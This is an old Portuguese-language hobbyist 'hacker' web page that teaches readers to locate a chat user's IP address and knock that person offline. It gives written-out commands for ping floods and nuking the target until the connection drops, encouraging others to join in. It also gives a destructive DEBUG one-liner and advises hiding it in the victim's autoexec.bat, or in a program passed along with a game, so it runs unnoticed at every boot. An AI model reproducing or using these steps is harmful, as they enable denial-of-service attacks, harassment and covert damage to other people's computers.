Make your own free website on Tripod.com

 

Reportagens

HAcker

Modem

Dicas de XP

Donwload

HAcker

Programas

 

Fale conosco

Brincando com o IP

Descobrindo o Ip ou Host de um provedor


Encontre no seu micro, o atalho ou aviso do MS-DOS. Clique nele, deverá surgir uma tela preta com a seguinte aparência:
C:IWINDOWS>
Nele digite:
ping www.provedorquevocêquer. com.br
Ficando assim:
C:IWINDOWS> PING www.provedorquevocêquer.com.br
Será retomado o Host da provedora bbs e etc... Quem sabe depois você começa a brincar de TeInet?

Eu tenho o IP e não sei o provedor


Digite no prompt do MS - DOS:
tracert ipdocaraaqui
Ficando assim :
C:IWINDOWS>TRACERT ipdocaraaqui
Será retornado o nome da provedora do cara, é só prestar atenção!!

Pegando IP em chat

Feche todos os seus aplicativos de rede, ICQ, FTP, XITAMI..., que você estiver usando. Feche todos os navegadores que não sejam da sala aonde o cara se encontra é lógico! Concentre-se só na sala do chat na qual se encontra o cara que você quer pegar o ip. Peça as pessoas que estão conversando com você para pararem de te mandarem mensagens, quando isto acontecer mande algumas mensagens em sequência para vitima, você aprende isto na parte de chat desta HP. Alterne para o seu MS-DOS (ALT +TAB) , na hora e digite:
arp -a
Ficando assim:
C:IWWDOWS> arp -a
Neste momento serão retomados, vários IP'S, ( 4 à 6 em média). O primeiro é o IP da sala aonde você se encontra. Entretanto, na "MAIORIA DAS VEZES" o segundo IP é do gafanhoto que você quer mandar para os sapos ! Se você não tem certeza e deseja confirmar isto, guarde o IP e compare com as informaçòes que você tem sobre a vítima (rovedora por
exemplo). Se você não sabe nada dela, paciência, pegue todos os IP's e nuke um à um, ou faça um ping flood que será explicado abaixo, ou repita o procedimento acima várias vezes e guarde os IP'S que estão repetindo com mais frequência. E tome as medidas que desejar.


Meu nuke não funciona


Tente o seguinte comando no prompt do MS-DOS:
ping -f-l1000 -t ipdocara
ou
ping -t -11000 -f ipdocara
Ficando assim:
C:IWfNDOWS>ping -f-11000 -t ipdocara
ou
C:IWINDOWS>ping -t -11000 -f ipdocara
Repita o procedimento ate ele cair. Lembre-se de que, quanto mais pessoas fazendo junto com você, mais rapido sera o tombei :-)))



Partindo para o desespero
Pegue um pense na parte de programas desta HP. Passe nas portas do micro do gafanhoto. Observe as que estão sem proteção e nukel A maioria dos nukes vem designado as portas 137, 138, 139. Então mude e "meta os ferro" nas portas que estão sem proteçào.


Partindo para o desespero a beira de um ataque de nervos
Passe o programa portscan nas portas do micro da vítima constantemente, ping o micro do cara como na lição 4. O "inimigo" no mínimo vai ficar urna lerdeza hehehehe... Se você quiser arriscar, nuke ao mesmo tempo. Aviso: quem pode perder a conexão é vocêl


Não deu porra nenhuma


Mude seu XT, com 4 megas de memoria RAM e modem de 14.400 de conexão inferior a capacidade do mesmo para um micro decente e um verdadeiro provedor, e vai a merda !.¡


Ficou com raiva mesmo !!!

Se nda dessas porras dé va na casa dele e escreva : echo f 0:0 ffff 0 | debug Isso estraga alguns programas do Windows. O único problema é que você tem que mexer no computador do cara para isso. Uma dica é colocar no autoexec.bat, o cara nem percebe você mexendo, e ele se ferra, sempre que ligar o micro. Mas se você não tem como mexer, mas sabe algo de programação, faça um programa que escreva no autoexec dele, quando for passar aquele jogo para ele.